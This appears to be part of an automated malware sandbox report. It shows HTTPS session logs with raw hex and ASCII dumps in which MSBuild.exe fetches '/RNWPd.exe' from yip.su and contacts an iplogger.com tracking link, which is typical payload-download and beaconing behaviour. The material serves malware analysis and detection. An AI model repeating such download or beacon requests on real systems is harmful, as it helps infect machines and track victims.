                    2024-09-16 19:20:28 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:20:28 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:20:28 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:20:28 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.649730188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:20:28 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:20:29 UTC900INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:20:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:20:28 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:20:29 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PF1bH%2FpuDitndHBDs47qh7Wb1W4QRdYALbpTqCfsQfdHaEedHBJmTRjuRL67j4%2B8N7r9wHzvZaap3QqZu3k%2F9ynV7GeT6etVXPjTL4t3rCHIRkDXEEACzGc%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c4336ccedb10fa1-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:20:29 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:20:29 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                    Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                    2024-09-16 19:20:29 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                    Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                    2024-09-16 19:20:29 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                    Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                    2024-09-16 19:20:29 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                    Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                    2024-09-16 19:20:29 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                    Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                    2024-09-16 19:20:29 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:20:29 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.649732104.21.76.574431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:20:33 UTC68OUTGET /1djqU4 HTTP/1.1
                    Host: iplogger.com
                    Connection: Keep-Alive
                    2024-09-16 19:20:34 UTC1285INHTTP/1.1 403 Forbidden
                    Date: Mon, 16 Sep 2024 19:20:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                    Cross-Origin-Embedder-Policy: require-corp
                    Cross-Origin-Opener-Policy: same-origin
                    Cross-Origin-Resource-Policy: same-origin
                    Origin-Agent-Cluster: ?1
                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                    Referrer-Policy: same-origin
                    X-Content-Options: nosniff
                    X-Frame-Options: SAMEORIGIN
                    cf-mitigated: challenge
                    2024-09-16 19:20:34 UTC689INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 66 57 7a 4b 74 79 69 35 6c 75 75 4d 35 52 71 64 4c 48 47 32 68 75 4f 43 47 59 63 69 41 72 63 65 77 6c 35 5a 2b 63 4f 65 57 75 4b 37 52 30 37 65 54 50 43 42 30 6e 2f 7a 37 69 4f 52 62 50 32 7a 69 30 59 6a 44 38 51 48 30 31 74 38 51 73 52 68 6e 61 69 47 2f 52 77 73 78 41 4f 52 43 44 54 52 53 70 6e 42 32 35 6b 50 6a 68 55 3d 24 4b 75 44 30 6e 63 57 45 63 4d 63 2b 56 4f 72 74 63 75 6d 45 72 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                    Data Ascii: cf-chl-out: fWzKtyi5luuM5RqdLHG2huOCGYciArcewl5Z+cOeWuK7R07eTPCB0n/z7iORbP2zi0YjD8QH01t8QsRhnaiG/RwsxAORCDTRSpnB25kPjhU=$KuD0ncWEcMc+VOrtcumErg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                    2024-09-16 19:20:34 UTC1369INData Raw: 34 30 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                    Data Ascii: 40ef<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                    2024-09-16 19:20:34 UTC1369INData Raw: 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67
                    Data Ascii: MSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.theme-dark #challenge-error-text{background-image:url(data:image/svg
                    2024-09-16 19:20:34 UTC1369INData Raw: 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d
                    Data Ascii: Igdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuM
                    2024-09-16 19:20:34 UTC1369INData Raw: 2e 33 39 31 70 78 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 67 72 69 64 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68
                    Data Ascii: .391px}.feedback-content{align-content:space-between;display:inline-grid;height:100vh;margin:0;padding:0}.feedback-content .spacer{margin:0}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top:4rem}.h
                    2024-09-16 19:20:34 UTC1369INData Raw: 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c
                    Data Ascii: tLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{background-image:url
                    2024-09-16 19:20:34 UTC1369INData Raw: 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 20 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28
                    Data Ascii: le}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{text-align:center}.footer .ray-id code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (
